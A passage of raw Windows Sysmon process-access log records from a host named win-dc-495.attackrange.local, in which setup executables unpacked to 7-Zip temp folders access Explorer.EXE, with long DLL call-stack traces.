em32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.817{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.786{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C